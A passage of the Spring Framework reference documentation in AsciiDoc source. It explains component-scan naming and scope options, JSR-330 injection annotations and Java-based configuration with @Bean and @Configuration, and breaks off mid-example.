...\n\t}\n----\n\n[NOTE]\n====\nIf you do not want to rely on the default bean-naming strategy, you can provide a custom\nbean-naming strategy. First, implement the\n{api-spring-framework}\/beans\/factory\/support\/BeanNameGenerator.html[`BeanNameGenerator`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n @ComponentScan(basePackages = \"org.example\", nameGenerator = MyNameGenerator.class)\n public class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tname-generator=\"org.example.MyNameGenerator\" \/>\n\t<\/beans>\n----\n\nAs a general rule, consider specifying the name with the annotation whenever other\ncomponents may be making explicit references to it. On the other hand, the\nauto-generated names are adequate whenever the container is responsible for wiring.\n\n\n\n[[beans-scanning-scope-resolver]]\n=== Providing a scope for autodetected components\n\nAs with Spring-managed components in general, the default and most common scope for\nautodetected components is `singleton`. However, sometimes you need a different scope\nwhich can be specified via the `@Scope` annotation. Simply provide the name of the scope\nwithin the annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Scope(\"prototype\")\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ ...\n\t}\n----\n\nFor details on web-specific scopes, see <<beans-factory-scopes-other>>.\n\n\n[NOTE]\n====\nTo provide a custom strategy for scope resolution rather than relying on the\nannotation-based approach, implement the\n{api-spring-framework}\/context\/annotation\/ScopeMetadataResolver.html[`ScopeMetadataResolver`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopeResolver = MyScopeResolver.class)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\t\tscope-resolver=\"org.example.MyScopeResolver\" \/>\n\t<\/beans>\n----\n\nWhen using certain non-singleton scopes, it may be necessary to generate proxies for the\nscoped objects. The reasoning is described in <<beans-factory-scopes-other-injection>>.\nFor this purpose, a __scoped-proxy__ attribute is available on the component-scan\nelement. The three possible values are: no, interfaces, and targetClass. For example,\nthe following configuration will result in standard JDK dynamic proxies:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopedProxy = ScopedProxyMode.INTERFACES)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tscoped-proxy=\"interfaces\" \/>\n\t<\/beans>\n----\n\n\n\n[[beans-scanning-qualifiers]]\n=== Providing qualifier metadata with annotations\n\nThe `@Qualifier` annotation is discussed in <<beans-autowired-annotation-qualifiers>>.\nThe examples in that section demonstrate the use of the `@Qualifier` annotation and\ncustom qualifier annotations to provide fine-grained control when you resolve autowire\ncandidates. Because those examples were based on XML bean definitions, the qualifier\nmetadata was provided on the candidate bean definitions using the `qualifier` or `meta`\nsub-elements of the `bean` element in the XML. When relying upon classpath scanning for\nautodetection of components, you provide the qualifier metadata with type-level\nannotations on the candidate class. The following three examples demonstrate this\ntechnique:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Qualifier(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Genre(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Offline**\n\tpublic class CachingMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nAs with most annotation-based alternatives, keep in mind that the annotation metadata is\nbound to the class definition itself, while the use of XML allows for multiple beans\n__of the same type__ to provide variations in their qualifier metadata, because that\nmetadata is provided per-instance rather than per-class.\n====\n\n\n\n\n[[beans-standard-annotations]]\n== Using JSR 330 Standard Annotations\nStarting with Spring 3.0, Spring offers support for JSR-330 standard annotations\n(Dependency Injection). Those annotations are scanned in the same way as the Spring\nannotations. You just need to have the relevant jars in your classpath.\n\n[NOTE]\n====\nIf you are using Maven, the `javax.inject` artifact is available in the standard Maven\nrepository (\nhttp:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/[http:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/]).\nYou can add the following dependency to your file pom.xml:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<dependency>\n\t\t<groupId>javax.inject<\/groupId>\n\t\t<artifactId>javax.inject<\/artifactId>\n\t\t<version>1<\/version>\n\t<\/dependency>\n----\n====\n\n\n\n[[beans-inject-named]]\n=== Dependency Injection with @Inject and @Named\n\nInstead of `@Autowired`, `@javax.inject.Inject` may be used as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nAs with `@Autowired`, it is possible to use `@Inject` at the field level, method level\nand constructor-argument level. Furthermore, you may declare your injection point as a\n`Provider`, allowing for on-demand access to beans of shorter scopes or lazy access to\nother beans through a `Provider.get()` call. As a variant of the example above:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Provider;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate Provider<MovieFinder> movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(Provider<MovieFinder> movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.get().findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nIf you would like to use a qualified name for the dependency that should be injected,\nyou should use the `@Named` annotation as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(@Named(\"main\") MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[beans-named]]\n=== @Named and @ManagedBean: standard equivalents to the @Component annotation\n\nInstead of `@Component`, `@javax.inject.Named` or `javax.annotation.ManagedBean` may be\nused as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named(\"movieListener\") \/\/ @ManagedBean(\"movieListener\") could be used as well\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nIt is very common to use `@Component` without specifying a name for the component.\n`@Named` can be used in a similar fashion:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nWhen using `@Named` or `@ManagedBean`, it is possible to use component scanning in the\nexact same way as when using Spring annotations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[NOTE]\n====\nIn contrast to `@Component`, the JSR-330 `@Named` and the JSR-250 `ManagedBean`\nannotations are not composable. Please use Spring's stereotype model for building custom\ncomponent annotations.\n====\n\n\n\n[[beans-standard-annotations-limitations]]\n=== Limitations of JSR-330 standard annotations\n\nWhen working with standard annotations, it is important to know that some significant\nfeatures are not available as shown in the table below:\n\n[[annotations-comparison]]\n.Spring component model elements vs. JSR-330 variants\n|===\n| Spring| javax.inject.*| javax.inject restrictions \/ comments\n\n| @Autowired\n| @Inject\n| `@Inject` has no 'required' attribute; can be used with Java 8's `Optional` instead.\n\n| @Component\n| @Named \/ @ManagedBean\n| JSR-330 does not provide a composable model, just a way to identify named components.\n\n| @Scope(\"singleton\")\n| @Singleton\n| The JSR-330 default scope is like Spring's `prototype`. However, in order to keep it\n consistent with Spring's general defaults, a JSR-330 bean declared in the Spring\n container is a `singleton` by default. In order to use a scope other than `singleton`,\n you should use Spring's `@Scope` annotation. `javax.inject` also provides a\n http:\/\/download.oracle.com\/javaee\/6\/api\/javax\/inject\/Scope.html[@Scope] annotation.\n Nevertheless, this one is only intended to be used for creating your own annotations.\n\n| @Qualifier\n| @Qualifier \/ @Named\n| `javax.inject.Qualifier` is just a meta-annotation for building custom qualifiers.\n Concrete String qualifiers (like Spring's `@Qualifier` with a value) can be associated\n through `javax.inject.Named`.\n\n| @Value\n| -\n| no equivalent\n\n| @Required\n| -\n| no equivalent\n\n| @Lazy\n| -\n| no equivalent\n\n| ObjectFactory\n| Provider\n| `javax.inject.Provider` is a direct alternative to Spring's `ObjectFactory`,\n just with a shorter `get()` method name. It can also be used in combination with\n Spring's `@Autowired` or with non-annotated constructors and setter methods.\n|===\n\n\n\n\n[[beans-java]]\n== Java-based container configuration\n\n\n\n[[beans-java-basic-concepts]]\n=== Basic concepts: @Bean and @Configuration\n\nThe central artifacts in Spring's new Java-configuration support are\n`@Configuration`-annotated classes and `@Bean`-annotated methods.\n\nThe `@Bean` annotation is used to indicate that a method instantiates, configures and\ninitializes a new object to be managed by the Spring IoC container. For those familiar\nwith Spring's `<beans\/>` XML configuration the `@Bean` annotation plays the same role as\nthe `<bean\/>` element. You can use `@Bean` annotated methods with any Spring\n`@Component`, however, they are most often used with `@Configuration` beans.\n\nAnnotating a class with `@Configuration` indicates that its primary purpose is as a\nsource of bean definitions. Furthermore, `@Configuration` classes allow inter-bean\ndependencies to be defined by simply calling other `@Bean` methods in the same class.\nThe simplest possible `@Configuration` class would read as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic MyService myService() {\n\t\t\treturn new MyServiceImpl();\n\t\t}\n\n\t}\n----\n\nThe `AppConfig` class above would be equivalent to the following Spring `<beans\/>` XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"myService\" class=\"com.acme.services.MyServiceImpl\"\/>\n\t<\/beans>\n----\n\n.Full @Configuration vs 'lite' @Beans mode?\n****\nWhen `@Bean` methods are declared within classes that are __not__ annotated with\n`@Configuration` they are referred to as being processed in a 'lite' mode. For example,\nbean methods declared in a `@Component` or even in a __plain old class__ will be\nconsidered 'lite'.\n\nUnlike full `@Configuration`, lite `@Bean` methods cannot easily declare inter-bean\ndependencies. Usually one `@Bean` method should not invoke another `@Bean` method when\noperating in 'lite' mode.\n\nOnly using `@Bean` methods within `@Configuration` classes is a recommended approach of\nensuring that 'full' mode is always used. This will prevent the same `@Bean` method from\naccidentally being invoked multiple times and helps to reduce subtle bugs that can be\nhard to track down when operating in 'lite' mode.\n****\n\nThe `@Bean` and `@Configuration` annotations will be discussed in depth in the sections\nbelow. First, however, we'll cover the various ways of creating a spring container using\nJava-based configuration.\n\n[[beans-java-instantiating-container]]\n=== Instantiating the Spring container using AnnotationConfigApplicationContext\n\nThe sections below document Spring's `AnnotationConfigApplicationContext`, new in Spring\n3.0. This versatile `ApplicationContext` implementation is capable of accepting not only\n`@Configuration` classes as input, but also plain `@Component` classes and classes\nannotated with JSR-330 metadata.\n\nWhen `@Configuration` classes are provided as input, the `@Configuration` class itself\nis registered as a bean definition, and all declared `@Bean` methods within the class\nare also registered as bean definitions.\n\nWhen `@Component` and JSR-330 classes are provided, they are registered as bean\ndefinitions, and it is assumed that DI metadata such as `@Autowired` or `@Inject` are\nused within those classes where necessary.\n\n\n[[beans-java-instantiating-container-contstructor]]\n==== Simple construction\n\nIn much the same way that Spring XML files are used as input when instantiating a\n`ClassPathXmlApplicationContext`, `@Configuration` classes may be used as input when\ninstantiating an `AnnotationConfigApplicationContext`. This allows for completely\nXML-free usage of the Spring container:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\nAs mentioned above, `AnnotationConfigApplicationContext` is not limited to working only\nwith `@Configuration` classes. Any `@Component` or JSR-330 annotated class may be supplied\nas input to the constructor. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(MyServiceImpl.class, Dependency1.class, Dependency2.class);\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\nThe above assumes that `MyServiceImpl`, `Dependency1` and `Dependency2` use Spring\ndependency injection annotations such as `@Autowired`.\n\n\n[[beans-java-instantiating-container-register]]\n==== Building the container programmatically using register(Class<?>...)\n\nAn `AnnotationConfigApplicationContext` may be instantiated using a no-arg constructor\nand then configured using the `register()` method. This approach is particularly useful\nwhen programmatically building an `AnnotationConfigApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.register(AppConfig.class, OtherConfig.class);\n\t\tctx.register(AdditionalConfig.class);\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t\tmyService.doStuff();\n\t}\n----\n\n\n[[beans-java-instantiating-container-scan]]\n==== Enabling component scanning with scan(String...)\n\nTo enable component scanning, just annotate your `@Configuration` class as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"com.acme\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[TIP]\n====\nExperienced Spring users will be familiar with the XML declaration equivalent from\nSpring's `context:` namespace\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t<\/beans>\n----\n====\n\n\nIn the example above, the `com.acme` package will be scanned, looking for any\n`@Component`-annotated classes, and those classes will be registered as Spring bean\ndefinitions within the container. `AnnotationConfigApplicationContext` exposes the\n`scan(String...)` method to allow for the same component-scanning functionality:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\t\tctx.scan(\"com.acme\");\n\t\tctx.refresh();\n\t\tMyService myService = ctx.getBean(MyService.class);\n\t}\n----\n\n[NOTE]\n====\nRemember that `@Configuration` classes are <<beans-meta-annotations,meta-annotated>>\nwith `@Component`, so they are candidates for component-scanning! In the example above,\nassuming that `AppConfig` is declared within the `com.acme` package (or any package\nunderneath), it will be picked up during the call to `scan()`, and upon `refresh()` all\nits `@Bean` methods will be processed and registered as bean definitions within the\ncontainer.\n====\n\n\n[[beans-java-instantiating-container-web]]\n==== Support for web applications with AnnotationConfigWebApplicationContext\n\nA `WebApplicationContext` variant of `AnnotationConfigApplicationContext` is available\nwith `AnnotationConfigWebApplicationContext`. This implementation may be used when\nconfiguring the Spring `ContextLoaderListener` servlet listener, Spring MVC\n`DispatcherServlet`, etc. What follows is a `web.xml` snippet that configures a typical\nSpring MVC web application. Note the use of the `contextClass` context-param and\ninit-param:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t<!-- Configure ContextLoaderListener to use AnnotationConfigWebApplicationContext\n\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t<context-param>\n\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t<param-value>\n\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Configuration locations must consist of one or more comma- or space-delimited\n\t\t\tfully-qualified @Configuration classes. Fully-qualified packages may also be\n\t\t\tspecified for component-scanning -->\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>com.acme.AppConfig<\/param-value>\n\t\t<\/context-param>\n\n\t\t<!-- Bootstrap the root application context as usual using ContextLoaderListener -->\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<!-- Declare a Spring MVC DispatcherServlet as usual -->\n\t\t<servlet>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<!-- Configure DispatcherServlet to use AnnotationConfigWebApplicationContext\n\t\t\t\tinstead of the default XmlWebApplicationContext -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextClass<\/param-name>\n\t\t\t\t<param-value>\n\t\t\t\t\torg.springframework.web.context.support.AnnotationConfigWebApplicationContext\n\t\t\t\t<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<!-- Again, config locations must consist of one or more comma- or space-delimited\n\t\t\t\tand fully-qualified @Configuration classes -->\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t\t<param-value>com.acme.web.MvcConfig<\/param-value>\n\t\t\t<\/init-param>\n\t\t<\/servlet>\n\n\t\t<!-- map all requests for \/app\/* to the dispatcher servlet -->\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>dispatcher<\/servlet-name>\n\t\t\t<url-pattern>\/app\/*<\/url-pattern>\n\t\t<\/servlet-mapping>\n\t<\/web-app>\n----\n\n\n\n[[beans-java-bean-annotation]]\n=== Using the @Bean annotation\n\n`@Bean` is a method-level annotation and a direct analog of the XML `<bean\/>` element.\nThe annotation supports some of the attributes offered by `<bean\/>`, such as:\n<<beans-factory-lifecycle-initializingbean,init-method>>,\n<<beans-factory-lifecycle-disposablebean,destroy-method>>,\n<<beans-factory-autowire,autowiring>> and `name`.\n\nYou can use the `@Bean` annotation in a `@Configuration`-annotated or in a\n`@Component`-annotated class.\n\n\n[[beans-java-declaring-a-bean]]\n==== Declaring a bean\n\nTo declare a bean, simply annotate a method with the `@Bean` annotation. You use this\nmethod to register a bean definition within an `ApplicationContext` of the type\nspecified as the method's return value. By default, the bean name will be the same as\nthe method name. The following is a simple example of a `@Bean` method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl();\n\t\t}\n\n\t}\n----\n\nThe preceding configuration is exactly equivalent to the following Spring XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"transferService\" class=\"com.acme.TransferServiceImpl\"\/>\n\t<\/beans>\n----\n\nBoth declarations make a bean named `transferService` available in the\n`ApplicationContext`, bound to an object instance of type `TransferServiceImpl`:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\ntransferService -> com.acme.TransferServiceImpl\n----\n\n\n[[beans-java-dependencies]]\n==== Bean dependencies\n\nA `@Bean` annotated method can have an arbitrary number of parameters describing the\ndependencies required to build that bean. For instance if our `TransferService`\nrequires an `AccountRepository` we can materialize that dependency via a method\nparameter:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic TransferService transferService(AccountRepository accountRepository) {\n\t\t\treturn new TransferServiceImpl(accountRepository);\n\t\t}\n\n\t}\n----\n\nThe resolution mechanism is pretty much identical to constructor-based dependency\ninjection, see <<beans-constructor-injection,the relevant section>> for more details.\n\n\n[[beans-java-lifecycle-callbacks]]\n==== Receiving lifecycle callbacks\n\nAny classes defined with the `@Bean` annotation support the regular lifecycle callbacks\nand can use the `@PostConstruct` and `@PreDestroy` annotations from JSR-250, see\n<<beans-postconstruct-and-predestroy-annotations,JSR-250 annotations>> for further\ndetails.\n\nThe regular Spring <<beans-factory-nature,lifecycle>> callbacks are fully supported as\nwell. If a bean implements `InitializingBean`, `DisposableBean`, or `Lifecycle`, their\nrespective methods are called by the container.\n\nThe standard set of `*Aware` interfaces such as <<beans-beanfactory,BeanFactoryAware>>,\n<<beans-factory-aware,BeanNameAware>>,\n<<context-functionality-messagesource,MessageSourceAware>>,\n<<beans-factory-aware,ApplicationContextAware>>, and so on are also fully supported.\n\nThe `@Bean` annotation supports specifying arbitrary initialization and destruction\ncallback methods, much like Spring XML's `init-method` and `destroy-method` attributes\non the `bean` element:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Foo {\n\t\tpublic void init() {\n\t\t\t\/\/ initialization logic\n\t\t}\n\t}\n\n\tpublic class Bar {\n\t\tpublic void cleanup() {\n\t\t\t\/\/ destruction logic\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(initMethod = \"init\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t\t@Bean(destroyMethod = \"cleanup\")\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nBy default, beans defined using Java config that have a public `close` or `shutdown`\nmethod are automatically enlisted with a destruction callback. If you have a public\n`close` or `shutdown` method and you do not wish for it to be called when the container\nshuts down, simply add `@Bean(destroyMethod=\"\")` to your bean definition to disable the\ndefault `(inferred)` mode.\n\nYou may want to do that by default for a resource that you acquire via JNDI as its\nlifecycle is managed outside the application. In particular, make sure to always do it\nfor a `DataSource` as it is known to be problematic on Java EE application servers.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws NamingException {\n\t\treturn (DataSource) jndiTemplate.lookup(\"MyDS\");\n\t}\n----\n\nAlso, with `@Bean` methods, you will typically choose to use programmatic JNDI lookups:\neither using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or straight JNDI\n`InitialContext` usage, but not the `JndiObjectFactoryBean` variant which would force\nyou to declare the return type as the `FactoryBean` type instead of the actual target\ntype, making it harder to use for cross-reference calls in other `@Bean` methods that\nintend to refer to the provided resource here.\n====\n\nOf course, in the case of `Foo` above, it would be equally as valid to call the `init()`\nmethod directly during construction:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\tFoo foo = new Foo();\n\t\t\tfoo.init();\n\t\t return foo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[TIP]\n====\nWhen you work directly in Java, you can do anything you like with your objects and do\nnot always need to rely on the container lifecycle!\n====\n\n\n[[beans-java-specifying-bean-scope]]\n==== Specifying bean scope\n\n[[beans-java-available-scopes]]\n===== Using the @Scope annotation\n\nYou can specify that your beans defined with the `@Bean` annotation should have a\nspecific scope. You can use any of the standard scopes specified in the\n<<beans-factory-scopes,Bean Scopes>> section.\n\nThe default scope is `singleton`, but you can override this with the `@Scope` annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\t**@Scope(\"prototype\")**\n\t\tpublic Encryptor encryptor() {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\n[[beans-java-scoped-proxy]]\n===== @Scope and scoped-proxy\n\nSpring offers a convenient way of working with scoped dependencies through\n<<beans-factory-scopes-other-injection,scoped proxies>>. The easiest way to create such\na proxy when using the XML configuration is the `<aop:scoped-proxy\/>` element.\nConfiguring your beans in Java with a @Scope annotation offers equivalent support with\nthe proxyMode attribute. The default is no proxy ( `ScopedProxyMode.NO`), but you can\nspecify `ScopedProxyMode.TARGET_CLASS` or `ScopedProxyMode.INTERFACES`.\n\nIf you port the scoped proxy example from the XML reference documentation (see preceding\nlink) to our `@Bean` using Java, it would look like the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ an HTTP Session-scoped bean exposed as a proxy\n\t@Bean\n\t**@SessionScope**\n\tpublic UserPreferences userPreferences() {\n\t\treturn new UserPreferences();\n\t}\n\n\t@Bean\n\tpublic Service userService() {\n\t\tUserService service = new SimpleUserService();\n\t\t\/\/ a reference to the proxied userPreferences bean\n\t\tservice.setUserPreferences(userPreferences());\n\t\treturn service;\n\t}\n----\n\n\n[[beans-java-customizing-bean-naming]]\n==== Customizing bean naming\n\nBy default, configuration classes use a `@Bean` method's name as the name of the\nresulting bean. This functionality can be overridden, however, with the `name` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = \"myFoo\")\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-aliasing]]\n==== Bean aliasing\n\nAs discussed in <<beans-beanname>>, it is sometimes desirable to give a single bean\nmultiple names, otherwise known as __bean aliasing__. The `name` attribute of the `@Bean`\nannotation accepts a String array for this purpose.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean(name = { \"dataSource\", \"subsystemA-dataSource\", \"subsystemB-dataSource\" })\n\t\tpublic DataSource dataSource() {\n\t\t\t\/\/ instantiate, configure and return DataSource bean...\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-bean-description]]\n==== Bean description\n\nSometimes it is helpful to provide a more detailed textual description of a bean. This can\nbe particularly useful when beans are exposed (perhaps via JMX) for monitoring purposes.\n\nTo add a description to a `@Bean` the\n{api-spring-framework}\/context\/annotation\/Description.html[`@Description`]\nannotation can be used:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Description(\"Provides a basic example of a bean\")**\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo();\n\t\t}\n\n\t}\n----\n\n\n[[beans-java-configuration-annotation]]\n=== Using the @Configuration annotation\n\n`@Configuration` is a class-level annotation indicating that an object is a source of\nbean definitions. `@Configuration` classes declare beans via public `@Bean` annotated\nmethods. Calls to `@Bean` methods on `@Configuration` classes can also be used to define\ninter-bean dependencies. See <<beans-java-basic-concepts>> for a general introduction.\n\n\n[[beans-java-injecting-dependencies]]\n==== Injecting inter-bean dependencies\n\nWhen ``@Bean``s have dependencies on one another, expressing that dependency is as simple\nas having one bean method call another:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\tpublic Foo foo() {\n\t\t\treturn new Foo(bar());\n\t\t}\n\n\t\t@Bean\n\t\tpublic Bar bar() {\n\t\t\treturn new Bar();\n\t\t}\n\n\t}\n----\n\nIn the example above, the `foo` bean receives a reference to `bar` via constructor\ninjection.\n\n[NOTE]\n====\nThis method of declaring inter-bean dependencies only works when the `@Bean` method is\ndeclared within a `@Configuration` class. You cannot declare inter-bean dependencies\nusing plain `@Component` classes.\n====\n\n\n[[beans-java-method-injection]]\n==== Lookup method injection\n\nAs noted earlier, <<beans-factory-method-injection,lookup method injection>> is an\nadvanced feature that you should use rarely. It is useful in cases where a\nsingleton-scoped bean has a dependency on a prototype-scoped bean. Using Java for this\ntype of configuration provides a natural means for implementing this pattern.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\t\tpublic Object process(Object commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command interface\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t\/\/ okay... but where is the implementation of this method?\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nUsing Java-configuration support , you can create a subclass of `CommandManager` where\nthe abstract `createCommand()` method is overridden in such a way that it looks up a new\n(prototype) command object:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\t@Scope(\"prototype\")\n\tpublic AsyncCommand 